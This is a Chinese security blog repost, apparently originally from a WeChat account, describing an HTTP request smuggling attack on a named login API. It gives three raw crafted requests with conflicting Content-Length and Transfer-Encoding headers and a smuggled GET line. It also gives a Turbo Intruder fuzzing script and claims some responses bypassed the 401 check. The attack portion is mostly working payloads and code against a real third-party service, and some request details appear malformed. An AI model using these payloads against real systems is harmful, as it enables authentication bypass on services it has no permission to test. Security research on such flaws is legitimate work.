登陆功能中存在的请求走私问题

admin
admin
admin
139574
文章
114
评论
2024年7月16日08:10:40评论25 views字数 2036阅读6分47秒阅读模式

登陆功能中存在的请求走私问题

正文

原请求:

POST /api/sessions HTTP/1.1
Host:console.helium.com
User-Agent:Mozilla/5.0(X11;Linuxx86_64;rv:68.0)Gecko/20100101Firefox/68.0
Accept:application/json,text/plain,*/*
Accept-Language:en-US,en;q=0.5
Accept-Encoding:gzip,deflate
Referer:https://console.helium.com/login
Content-Type:application/json
Content-Length:109
DNT:1
Connection:close
Cookie:key=value


{"session":{"email":"[email protected]","password":"sdfsdf"}}

响应为401

第二步:

POST /api/sessions HTTP/1.1
Host:console.helium.com
User-Agent:Mozilla/5.0(X11;Linuxx86_64;rv:68.0)Gecko/20100101Firefox/68.0
Accept:application/json,text/plain,*/*
Accept-Language:en-US,en;q=0.5
Accept-Encoding:gzip,deflate
Referer:https://console.helium.com/login
Content-Type:application/json
Content-Length:109
DNT:1
Connection:close
Cookie:key=value
Transfer-Encoding:chunked

39
{"session":{"email":"[email protected]","password":"sdfsdf"}}
00

响应仍然为401

第三步:


POST /api/sessions HTTP/1.1
Host:console.helium.com
User-Agent:Mozilla/5.0(X11;Linuxx86_64;rv:68.0)Gecko/20100101Firefox/68.0
Accept:application/json,text/plain,*/*
Accept-Language:en-US,en;q=0.5
Accept-Encoding:gzip,deflate
Referer:https://console.helium.com/login
Content-Type:application/json
Content-Length:109
DNT:1
Connection:close
Cookie:key=value
Transfer-Encoding:chunked

39
{"session":{"email":"[email protected]","password":"sdfsdf"}}
00

GET /HTTP/1.1
Host:www.helium.com
foo:x

注意:上面的39是16进制的

这里需要使用到一个插件:turbo intruder(一般并发的时候也是使用的这个插件)

这里选中x,然后右击发送至turbo intruder

可以利用下面这个脚本:

def queueRequests(target,wordlists):
engine=RequestEngine(endpoint=target.endpoint,
                 concurrentConnections=1,
                 requestsPerConnection=50,
                 pipeline=False
                  )

for i in range(3,8):
      engine.queue(target.req,randstr(i),learn=1)
      engine.queue(target.req,target.baseInput,learn=2)

for word in open('/yourpath/to/dict/alphabet.txt'):
      engine.queue(target.req,word.rstrip())


def handleResponse(req,interesting):
    table.add(req)

上面的字典可以自己写个脚本设置一下,里面主要包含字母和数字,不是很复杂

然后点击attack,即可开始发起攻击,最后如下所示:

登陆功能中存在的请求走私问题

最后发现有几个的响应是200,说明是绕过401的

原文始发于微信公众号(迪哥讲事):登陆功能中存在的请求走私问题

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月16日08:10:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   登陆功能中存在的请求走私问题http://cn-sec.com/archives/2958567.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息